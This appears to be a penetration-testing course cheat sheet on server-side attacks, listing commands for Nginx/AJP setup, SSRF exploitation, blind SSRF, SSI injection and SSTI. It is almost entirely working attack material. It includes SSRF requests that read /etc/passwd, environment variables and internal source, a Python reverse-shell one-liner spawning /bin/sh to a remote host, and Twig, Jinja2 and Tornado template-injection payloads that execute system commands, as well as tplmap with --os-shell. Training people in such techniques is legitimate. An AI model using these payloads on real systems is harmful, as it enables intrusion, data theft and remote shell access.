# Cheat sheet - server side attacks **Cheat Sheet** The cheat sheet is a useful command reference for this module. ### Nginx Reverse Proxy & AJP | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------- | | `wget https://nginx.org/download/nginx-1.21.3.tar.gz` | Downloading nginx | | `tar -xzvf nginx-1.21.3.tar.gz` | Extracting nginx tar file | | `git clone https://github.com/dvershinin/nginx_ajp_module.git` | Cloning nginx\_ajp source code | | `cd nginx-1.21.3` | Navigating to nginx directory | | `./configure --add-module=$(pwd)/../nginx_ajp_module --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules` | Setting up the configuration for building and installing Nginx web server | | `make` | GNU make utility to maintain groups of programs | | `sudo make install` | Instructing the make command to execute the installation target defined in the make file | | `sudo nginx` | Starting the nginx server | ### SSRF Exploitation Example | **Command** | **Description** | | ----------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------ | | `nmap -sT -T5 --min-rate=10000 -p- 10.129.201.238` | Scanning the ports of the external target | | `curl -i -s -L http://` | Interacting with the target and following redirects | | `nc -lvnp 8080` | Starting a netcat listener to test for SSRF | | `curl -i -s "http:///load?q=http://:8080"` | Testing for SSRF vulnerability | | `python3 -m http.server 9090` | Starting the python web server | | `sudo pip3 install twisted` | Installing the ftp server | | `sudo python3 -m twisted ftp -p 21 -r .` | Starting the ftp server | | `curl -i -s "http:///load?q=http://:9090/index.html"` | Retrieving a remote file through the target application (HTTP Schema) | | `curl -i -s "http:///load?q=file:///etc/passwd"` | Retrieving a local file through the target application (File Schema) | | `for port in {1..65535};do echo $port >> ports.txt;done` | Generating a wordlist of possible ports | | `ffuf -w ./ports.txt:PORT -u "http:///load?q=http://127.0.0.1:PORT" -fs 30` | Fuzzing for ports on the internal interface | | `curl -i -s "http:///load?q=http://127.0.0.1:5000"` | Interacting with the internal interface on the discovered port | | `curl -i -s "http:///load?q=http://internal.app.local/load?q=index.html"` | Interacting with the internal application | | `curl -i -s "http:///load?q=http://internal.app.local/load?q=http://127.0.0.1:1"` | Discovering web application listening in on localhost | | `curl -i -s "http:///load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"` | Modifying the URL to bypass the error message | | `curl -i -s "http:///load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -` | Requesting to disclose the /proc/self/environ file on the internal application | | `curl -i -s "http:///load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"` | Retrieving a local file through the target application | | `curl -i -s "http:///load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"` | Confirming remote code exeuction on the remote host | | `sudo apt-get install jq` | Installing jq | ### Blind SSRF Exploitation Example | **Command** | **Description** | | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------ | | `nc -lvnp 9090` | Starting a netcat listener | | `echo """""" \| base64 -d` | Decoding the base64 encoded response | | `export RHOST="";export RPORT="";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'` | Reverse shell payload (to be URL encoaded twice) | ### SSI Injection Exploitation Example | **SSI Directive Payload** | **Description** | | ----------------------------------------------------------------------------------------------------------- | --------------- | | `` | Date | | `` | All variables | | `` | Reverse Shell | ### SSTI Exploitation Example 1 | **Command** | **Description** | | -------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------ | | `git clone https://github.com/epinna/tplmap.git` | Cloning the tplmap repoistory | | `cd tplmap` | Navigating to the new directory | | `pip install virtualenv` | Installing the virtual environment with pip | | `virtualenv -p python2 venv` | Creating a virtual environment named venv with python2 | | `source venv/bin/activate` | Activating a Python virtual environment, configuring the shell to use the virtual environment's Python interpreter | | `pip install -r requirements.txt` | Installing dependencies | | `./tplmap.py -u 'http://:' -d name=john` | Running tplmap against the target | | `./tplmap.py -u 'http://:' -d name=john --os-shell` | Running tplmap with the os-shell option | | `{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}` | Twig RCE payload | ### SSTI Exploitation Example 2 | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------- | | `curl -X POST -d 'email=${7*7}' http://:/jointheteam` | Interacting with the remote target (Spring payload) | | `curl -X POST -d 'email={{_self.env.display("TEST"}}' http://:/jointheteam` | Interacting with the remote target (Twig payload) | | `curl -X POST -d 'email={{config.items()}}' http://:/jointheteam` | Interacting with the remote target (Jinja2 basic injection) | | `curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://:/jointheteam` | Interacting with the remote target (Jinja2 dump all classes payload) | | `curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://:/jointheteam` | Interacting with the remote target (Tornado payload) | | `./tplmap.py -u 'http://:/jointheteam' -d email=blah` | Automating the exploitation process with tplmap | ### SSTI Exploitation Example 3 | **Command** | **Description** | | ------------------------------------------------------------ | ------------------------------------------------------------------- | | `curl -gs "http://:/execute?cmd={{7*'7'}}"` | Interacting with the remote target (Confirming Jinja2 backend) | | `./tplmap.py -u 'http://:/execute?cmd'` | Automating the templating engine identification process with tplmap | | `python3` | Starting the python3 interpreter | | **Methods** | **Description** | | ---------------- | ----------------------------------------------------------------------------------------------------------------------------------- | | `__class__` | Returns the object (class) to which the type belongs | | `__mro__` | Returns a tuple containing the base class inherited by the object. Methods are parsed in the order of tuples. | | `__subclasses__` | Each new class retains references to subclasses, and this method returns a list of references that are still available in the class | | `__builtins__` | Returns the builtin methods included in a function | | `__globals__` | A reference to a dictionary that contains global variables for a function | | `__base__` | Returns the base class inherited by the object | | `__init__` | Class initialization method |